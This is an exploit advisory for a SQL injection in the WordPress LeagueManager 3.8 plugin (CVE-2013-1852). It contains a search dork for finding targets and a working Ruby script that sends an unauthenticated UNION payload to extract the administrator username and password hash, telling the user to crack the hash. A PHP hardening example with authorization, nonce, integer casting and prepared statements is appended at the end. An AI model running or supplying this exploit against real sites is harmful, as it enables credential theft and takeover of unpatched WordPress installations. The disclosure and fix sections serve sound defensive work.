#!/usr/bin/ruby
# Title: WordPress LeagueManager Plugin v3.8 SQL Injection
# Keywords: inurl:"/wp-content/plugins/leaguemanager/"
# Author: Joshua Reynolds
# Official Program Website: http://wordpress.org/extend/plugins/leaguemanager/
# Download: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip
# Affected Versions: 3.8
# Testing Platform: BT5R1 - Ubuntu 10.04.2 LTS
# CVE: CVE-2013-1852
#
# Overview:
# An SQL injection vulnerability exists in the league_id parameter of a function call made
# by the leaguemanager_export page. This request is processed within leaguemanager.php:
#
#   if (isset($_POST['leaguemanager_export']))
#     $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);
#
# which does not sanitize for SQL injection, and is passed to the admin/admin.php page
# into the export($league_id, $mode) function, which also does not sanitize for SQL injection
# when making this call:
#
#   $this->league = $leaguemanager->getLeague($league_id);
#
# The information is then echoed to a CSV file that is then provided for download.
# Since no authentication is required when making a POST request to this page,
# i.e. /wp-admin/admin.php?page=leaguemanager-export, the request can be made with no
# established session.
#
# Solution:
# A possible fix for this would be to cast the league_id to an integer during any
# of the function calls. The following change can be made in the leaguemanager.php file:
#
#   $lmLoader->adminPanel->export((int) $_POST['league_id'], $_POST['mode']);
#
# These functions should also not be available to public requests, and thus session handling
# should also be checked prior to the requests being processed within the admin section.
#
# The responsible disclosure process was distorted by the fact that the author no longer
# supports his well established plugin, and there are currently no maintainers. After
# e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin
# and not patch the vulnerability.
#
# The following Ruby exploit will retrieve the administrator username and the salted
# password hash from a given site with the plugin installed:
#
# Exploit:

require 'net/http'
require 'uri'

if ARGV.length == 2
  # The injected league_id pads the UNION to match the column count of the export query;
  # user_login and user_pass from wp_users end up in the CSV the plugin returns.
  post_params = {
    'league_id' => '7 union select all user_login,2,3,4,5,6,7,8,' \
                   '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22 from wp_users-- ',
    'mode' => 'teams',
    'leaguemanager_export' => 'Download+File'
  }
  target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export"

  begin
    resp = Net::HTTP.post_form(URI.parse(target_url), post_params)
  rescue
    puts "Invalid URL..."
  end

  if resp.nil?
    puts "No response received..."
  elsif resp.code != "200"
    puts "Page doesn't exist!"
  else
    # Pull the username and hash out of the tab-separated CSV body.
    admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)
    if admin_login.length > 0
      puts "Username: #{admin_login[0][0]}"
      puts "Hash: #{admin_login[0][1]}"
      puts "\nNow go crack that with Hashcat :)"
    else
      puts "Username and hash not retrieved. Maybe it's patched?"
    end
  end
else
  puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
end

# Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.
# Contact:
# Mail: infosec4breakfast@gmail.com
# Blog: infosec4breakfast.com
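# Hardened version of the leaguemanager_export dispatch described in the Solution section above,
# as an added example that is not the plugin's or the author's code. The admin_init hook, the
# manage_options capability, the nonce action name, the mode allowlist and the table name are assumptions.

```php
<?php
// Added example (not the plugin's code): the export dispatch with the checks the
// advisory calls for. Hook, capability, nonce action, modes and table are assumptions.
add_action('admin_init', function () {
    if (!isset($_POST['leaguemanager_export'])) {
        return;
    }

    // 1. Session/authorization: anonymous POSTs to admin.php must never reach export().
    if (!is_user_logged_in() || !current_user_can('manage_options')) {
        wp_die('Insufficient permissions.', '', array('response' => 403));
    }

    // 2. CSRF: the export form must carry a nonce for this action (action name assumed).
    check_admin_referer('leaguemanager-export');

    // 3. Type enforcement: the advisory's (int) cast. absint() also drops negatives,
    //    so a value such as "7 union select ..." collapses to 7 and nothing else reaches SQL.
    $league_id = absint(isset($_POST['league_id']) ? $_POST['league_id'] : 0);
    if ($league_id === 0) {
        wp_die('Invalid league id.', '', array('response' => 400));
    }

    // 4. Allowlist the second parameter too instead of passing it through untouched.
    $allowed_modes = array('teams', 'matches'); // assumed set of export modes
    $mode = (isset($_POST['mode']) && in_array($_POST['mode'], $allowed_modes, true))
        ? $_POST['mode']
        : 'teams';

    global $lmLoader;
    $lmLoader->adminPanel->export($league_id, $mode);
});

// 5. Defence in depth in the data layer: even with an integer id, bind the value
//    rather than interpolating it into the query. Table and column names are assumed.
function lm_get_league_safe($league_id) {
    global $wpdb;
    return $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}leaguemanager_leagues WHERE id = %d",
            $league_id
        )
    );
}
```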